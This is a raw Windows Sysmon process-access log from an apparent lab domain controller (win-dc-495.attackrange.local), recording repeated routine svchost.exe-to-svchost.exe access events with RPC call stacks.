13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 